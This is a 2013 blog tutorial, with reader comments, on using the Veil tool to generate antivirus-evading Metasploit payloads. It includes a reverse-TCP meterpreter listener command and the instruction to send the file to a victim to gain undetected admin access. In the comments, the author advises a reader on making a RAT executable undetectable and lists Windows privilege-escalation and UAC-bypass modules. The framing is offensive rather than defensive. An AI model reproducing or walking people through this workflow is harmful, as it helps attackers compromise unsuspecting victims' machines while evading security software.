Sunday, August 11, 2013

Bypass AV using Veil In Backtrack.

Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using Veil. Veil is python based tool which create FUD payload.

How to Download & use ?

cd Veil-master/setup
chmod +x

It will download all required python package for generating payload.

Veil is officially supported in Kali linux ; But it`s python based tool so we can use it in any os which is able to execute python script. I used it in Backtrack 5.We have to make some change in generated file to get working in backtrack.
Open directory of veil & go to config and open latest version of veil , open /etc/veil/ If you installed metasploit from binary package then Change  line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.

Go to veil direcory & run


Now type list & you can see available payload.


Select payload.
type generate.


After that payload has been generated & you have to start metasploit listner for that payload type following in terminal.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=444 E


Now send file to victim. As soon as he open file you get admin access without triggering AV alert.Look at my AV update status.


 As you can see in bottom of panel that AV is activate & it`s updated  ; still we can bypass AV & get meterpreter seesion.

 [!] And don't submit samples to any online scanner! ;)
It`s author request.


Newsmaker said...

Hi thanks for this share.

Can i make FUD my server.exe RAT with this method?

nirav desai said...

sure.pescrambler & hyperion are crypter you can encrypt your exe file which are available in Veil. ; i `m not sure about FUD. but if you know AV then you can find work around@Az Zone

Newsmaker said...

But, where can i put my server.exe or call with commands?
Please, can you explain me with pictures. I confused.

nirav desai said...

after selecting number for crypter use this command "set original_exe
/path/of/your/exe" & then generate. If you don`t get it. tell me your email ID@Az Zone

Unknown said...

how to
Open directory of veil & go to config and open If you installed metasploit from binary package then Change last line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.

Go to veil direcory & run

could you send me the screenshots how to do that on my email

IT Computer said...

Dear i install Veil on backtrack with python all module but still show this error please help me

Traceback (most recent call last):
File "./", line 14, in
import argparse
ImportError: No module named argparse

IT Computer said...

Dear i install Veil on backtrack with python all module but still show this error please help me

Traceback (most recent call last):
File "./", line 14, in
import argparse
ImportError: No module named argparse

nirav desai said...

As your error suggest you don`t have install argparse module. To install argparse or run following command
pip install argparse@IT Computer

floppy said...

how can we bypass uac when use getsystem command ?

nirav desai said...

You can use bypassuac module which is located in exploit/windows/local/bypassuac ; but most of AV will catch it; so you have to make bypassuac binary FUD ; then manually upload using meterpreter session & then execute it.Also there is bunch of modules in exploit/windows/local folder which are used to get system level access , some of them are ms10_015_kitrap0d,ms10_092_schelevator,ppr_flatten_rec,service_permissions.Also for 64 bit os ; there is sysret exploit.@floppy

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